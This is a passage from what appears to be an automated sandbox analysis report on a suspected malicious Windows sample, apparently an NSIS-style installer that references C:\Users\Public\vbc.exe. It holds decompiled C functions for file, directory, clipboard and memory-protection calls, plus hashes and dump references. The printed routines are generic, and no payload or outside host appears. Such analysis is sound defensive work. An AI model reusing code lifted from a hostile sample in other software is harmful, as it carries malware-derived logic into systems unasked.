                                                                                                                                                                                                            • Part of subcall function 004065E8: wsprintfA.USER32 ref: 00406638
                                                                                                                                                                                                            • Part of subcall function 004065E8: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040664C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2547128583-0
                                                                                                                                                                                                          • Opcode ID: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                                                                                                                                                                                          • Instruction ID: a5acf963d4dc7277efada4342fe0793da34265ba7e3dd7efcecf40f1b2e2af73
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48E086326042106AD6106B705E0497773A89F847103034D3EF94AF2140D739DC31966D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405DE6, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                          			E00405DE6(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                                                                                                                                          0x00405dea
                                                                                                                                                                                                          0x00405df7
                                                                                                                                                                                                          0x00405e0c
                                                                                                                                                                                                          0x00405e12

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405DEA
                                                                                                                                                                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                                                                                          • Opcode ID: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
                                                                                                                                                                                                          • Instruction ID: c1cd633b288b309c16b37b55694bd397a2d2f3fd27c3ea135bedd35eac3c4d3c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9D09E31254602AFEF0D8F20DE16F2E7AA2EB84B00F11952CB682944E2DA715819AB19
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405DC1, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00405DC1(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                                                                                                                                                                          0x00405dc6
                                                                                                                                                                                                          0x00405dcc
                                                                                                                                                                                                          0x00405dd1
                                                                                                                                                                                                          0x00405dda
                                                                                                                                                                                                          0x00405dda
                                                                                                                                                                                                          0x00405de3

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(?,?,004059D9,?,?,00000000,00405BBC,?,?,?,?), ref: 00405DC6
                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DDA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                          • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                                                                                                                                                          • Instruction ID: cf7f7f764d64860b039e5252603fd5f93999e207008e06c25ada038bd68c9de4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16D0C976504421AFC2112728AE0C89BBB55DB542B1702CA36FDA5A26B2DB304C569A98
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004058B7, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E004058B7(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                                                                                                                                                          0x004058bd
                                                                                                                                                                                                          0x004058c5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004058cb
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateDirectoryA.KERNELBASE(?,00000000,00403479,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004058BD
                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058CB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1375471231-0
                                                                                                                                                                                                          • Opcode ID: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
                                                                                                                                                                                                          • Instruction ID: 533fd4e2b3ea02dfd4e86ffada44851bb532735a7b96714f173b1300ab50f423
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53C04C31214A019BE6506B319F09B177BA4AF50741F118439678AF01A1DB34846ADA6D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405E5E, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00405E5E(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                                                                                                          0x00405e62
                                                                                                                                                                                                          0x00405e72
                                                                                                                                                                                                          0x00405e7a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405e81
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405e83

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000), ref: 00405E72
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                          • Opcode ID: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
                                                                                                                                                                                                          • Instruction ID: 7c3f96e10be73f403a44b868b48459b61dea37020128cbb38d3373314b5f95ad
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79E0B63221465AAFDF509F95DC00AEB7B6CEB15260F004836BE59E2190D631EA21DAE8
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405E8D, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00405E8D(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                                                                                                          0x00405e91
                                                                                                                                                                                                          0x00405ea1
                                                                                                                                                                                                          0x00405ea9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405eb0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405eb2

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000), ref: 00405EA1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                                          • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                                          • Instruction ID: 65ef4e0bd98581bd1f6bd632b42787c8420692956f3b06be75fa4a484c2a9a78
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFE08C3220125AABEF119F60CC00AEB3B6CFB04361F004433FAA4E3140E230E9208BE4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 72E32921, Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x72e34038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x72e3404c, 4, 0x40, 0x72e3403c); // executed
					 *0x72e3404c = 0xc2;
					 *0x72e3403c = 0;
					 *0x72e34044 = 0;
					 *0x72e34058 = 0;
					 *0x72e34048 = 0;
					 *0x72e34040 = 0;
					 *0x72e34050 = 0;
					 *0x72e3404e = 0;
				}
				return 1;
			}



                                                                                                                                                                                                          0x72e3292a
                                                                                                                                                                                                          0x72e3292f
                                                                                                                                                                                                          0x72e3293f
                                                                                                                                                                                                          0x72e32947
                                                                                                                                                                                                          0x72e3294e
                                                                                                                                                                                                          0x72e32953
                                                                                                                                                                                                          0x72e32958
                                                                                                                                                                                                          0x72e3295d
                                                                                                                                                                                                          0x72e32962
                                                                                                                                                                                                          0x72e32967
                                                                                                                                                                                                          0x72e3296c
                                                                                                                                                                                                          0x72e3296c
                                                                                                                                                                                                          0x72e32974

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(72E3404C,00000004,00000040,72E3403C), ref: 72E3293F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2167878164.0000000072E31000.00000020.00020000.sdmp, Offset: 72E30000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167873253.0000000072E30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167884351.0000000072E33000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167889901.0000000072E35000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                          • Opcode ID: 532a3df30216d43ba0e417e0063ea9de8fb92762706b740eb7274e856daf210e
                                                                                                                                                                                                          • Instruction ID: 1fc97f4c5899db4a9ccaffe9a1af681ea0013c8a052b824c1b1f3fce7d9ee240
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 532a3df30216d43ba0e417e0063ea9de8fb92762706b740eb7274e856daf210e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8F074BA788249DEC351CB6A8C847053BE8A314257BA1896EE598D6243E33448848F12
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040343E, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E0040343E(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                                                                                                                                          0x0040344c
                                                                                                                                                                                                          0x00403452

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313E,?), ref: 0040344C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                          • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                                                                                                                                                          • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                          Function 004054B2, Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                                          			E004054B2(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x42ec24; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405446, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E004062E0(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x42a8b8;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42ec0c - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42f448, 8);
							__eflags =  *0x42f4ec - _t150;
							if( *0x42f4ec == _t150) {
								E00405374( *((intOrPtr*)( *0x42a090 + 0x34)), _t150);
							}
							E004042AA(1);
							goto L25;
						}
						 *0x429c88 = 2;
						E004042AA(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00404338(_t157, _a12, _a16);
						}
						ShowWindow( *0x42ec10, _t150);
						ShowWindow(_v8, 8);
						E00404306(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x42f454;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x42ec10 = GetDlgItem(_a4, 0x403);
				 *0x42ec08 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x42ec24 = _t128;
				_v8 = _t128;
				E00404306( *0x42ec10);
				 *0x42ec14 = E00404BF7(4);
				 *0x42ec2c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004042D1(_a4);
				if(( *0x42f45c & 0x00000003) != 0) {
					ShowWindow( *0x42ec10, _t150);
					if(( *0x42f45c & 0x00000002) != 0) {
						 *0x42ec10 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404306( *0x42ec08);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42f45c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}



































                                                                                                                                                                                                          0x004054b8
                                                                                                                                                                                                          0x004054c0
                                                                                                                                                                                                          0x004054c3
                                                                                                                                                                                                          0x004054cb
                                                                                                                                                                                                          0x004054ce
                                                                                                                                                                                                          0x0040565d
                                                                                                                                                                                                          0x00405663
                                                                                                                                                                                                          0x00405687
                                                                                                                                                                                                          0x00405687
                                                                                                                                                                                                          0x00405693
                                                                                                                                                                                                          0x00405699
                                                                                                                                                                                                          0x004056bb
                                                                                                                                                                                                          0x004056bb
                                                                                                                                                                                                          0x004056c1
                                                                                                                                                                                                          0x00405716
                                                                                                                                                                                                          0x00405716
                                                                                                                                                                                                          0x00405719
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040571b
                                                                                                                                                                                                          0x0040571e
                                                                                                                                                                                                          0x00405721
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040572b
                                                                                                                                                                                                          0x00405731
                                                                                                                                                                                                          0x00405733
                                                                                                                                                                                                          0x00405736
                                                                                                                                                                                                          0x00405833
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405833
                                                                                                                                                                                                          0x00405745
                                                                                                                                                                                                          0x00405751
                                                                                                                                                                                                          0x0040575a
                                                                                                                                                                                                          0x00405761
                                                                                                                                                                                                          0x00405765
                                                                                                                                                                                                          0x00405768
                                                                                                                                                                                                          0x00405771
                                                                                                                                                                                                          0x00405777
                                                                                                                                                                                                          0x0040577a
                                                                                                                                                                                                          0x0040577a
                                                                                                                                                                                                          0x0040578a
                                                                                                                                                                                                          0x00405790
                                                                                                                                                                                                          0x00405793
                                                                                                                                                                                                          0x0040579e
                                                                                                                                                                                                          0x0040579e
                                                                                                                                                                                                          0x0040579f
                                                                                                                                                                                                          0x004057a2
                                                                                                                                                                                                          0x004057a9
                                                                                                                                                                                                          0x004057b0
                                                                                                                                                                                                          0x004057b8
                                                                                                                                                                                                          0x004057b8
                                                                                                                                                                                                          0x004057c6
                                                                                                                                                                                                          0x004057cc
                                                                                                                                                                                                          0x004057cf
                                                                                                                                                                                                          0x004057cf
                                                                                                                                                                                                          0x004057d6
                                                                                                                                                                                                          0x004057dc
                                                                                                                                                                                                          0x004057e5
                                                                                                                                                                                                          0x004057ec
                                                                                                                                                                                                          0x004057f5
                                                                                                                                                                                                          0x004057f7
                                                                                                                                                                                                          0x004057fa
                                                                                                                                                                                                          0x00405809
                                                                                                                                                                                                          0x0040580b
                                                                                                                                                                                                          0x0040580e
                                                                                                                                                                                                          0x0040580f
                                                                                                                                                                                                          0x00405812
                                                                                                                                                                                                          0x00405813
                                                                                                                                                                                                          0x00405814
                                                                                                                                                                                                          0x00405814
                                                                                                                                                                                                          0x0040581c
                                                                                                                                                                                                          0x00405827
                                                                                                                                                                                                          0x0040582d
                                                                                                                                                                                                          0x0040582d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405793
                                                                                                                                                                                                          0x004056c3
                                                                                                                                                                                                          0x004056c9
                                                                                                                                                                                                          0x004056f7
                                                                                                                                                                                                          0x004056f9
                                                                                                                                                                                                          0x004056ff
                                                                                                                                                                                                          0x0040570a
                                                                                                                                                                                                          0x0040570a
                                                                                                                                                                                                          0x00405711
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405711
                                                                                                                                                                                                          0x004056cd
